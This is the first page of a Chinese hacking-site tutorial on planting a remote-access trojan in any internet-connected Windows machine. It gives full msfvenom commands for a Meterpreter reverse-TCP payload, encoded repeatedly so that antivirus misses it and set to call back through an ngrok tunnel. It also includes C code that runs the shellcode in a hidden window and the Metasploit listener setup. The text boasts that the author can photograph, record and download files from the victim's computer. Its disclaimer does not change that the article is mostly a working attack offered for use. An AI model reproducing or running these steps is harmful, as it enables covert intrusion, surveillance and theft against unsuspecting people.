欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

来源:本站整理 作者:佚名 时间:2017-06-14 TAG: 我要投稿

*本文只做技术交流之用,技术无罪,希望大家知法懂法,更要守法

我发一个文件,你电脑就被我控制了,我可以拍照摄像下载文件,杀毒软件也不管用!这是怎么做到的呢?
这个问题的实现需要拆分成下面三个模块
内网穿透到外网
制作免杀木马后门
Metasploit控制客户机
环境准备
操作系统
用途
IP地址
需要软件
Kali
制作payload,攻击,映射端口
192.168.1.130
Metasploit Ngrok
Win7
制作payload
省略
VC++6.0
Win10
客户机
任意公网地址

 内网穿透到外网
首先我们需要下载一个用于内网穿透的工具来进行端口映射与转发。
这里我用的是linux64bit
https://www.ngrok.cc/#down-client
接下来在上面的网站自行注册申请,然后登陆。

然后申请免费隧道,选择TCP协议,自定义远程端口,本地IP地址就是kali的IP地址,端口自定义,但不要冲突。

这里请记住隧道id,以及自定义远程端口,kali本机端口
将下载的客户端放置于指定目录,cd到目录,在命令行运行ngrok
./sunny clientid 隧道id

这样就完成了端口映射,它能将外网端口接收到的数据返回到本机kali的指定端口。内网穿透的用途很多,下面给出说明,这里不再赘述。
https://ngrok.com/docs
 制作免杀木马后门
首先,在kali中用msfvenom生成一个payload
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f c
上面命令中,-p选择指定payload,–e选择制定编码器(不同编码器免杀效果也有不同,部分编码器应对火绒等杀软效果显著), -i 编码次数,-b 去多余/坏字符,lhost是你申请的ngrok服务器地址 lport是自定义的远程端口,-f 生成指定格式。
我这里选择生成基于C语言的数组,当然你也可以用以下命令直接得到exe木马,但这样免杀效果会打折扣,经笔者测试多次,重复编码12次后免杀效果非常强大!
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f exe > haya.exe
然后复制buf数组

在win7下用VC6.0对下面代码进行编译,得到木马。
#include
#pragmacomment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行时不显示窗口
unsignedchar buf[] =
"buf数组";//将复制的数组粘贴到此处
main()
{
((void(*)(void))&buf)();
}

 Metasploit控制客户机
切到Kali,使用Metasploit进行监听。

设置监听攻击模块,监听载荷,IP(kali本机),端口(ngrok里自定义的本地端口),然后exp。
use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 192.168.1.130
set lport 12345
exploit

当客户机执行木马后,得到一个meterpreter,可以进行的操作你懂的哈哈。

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载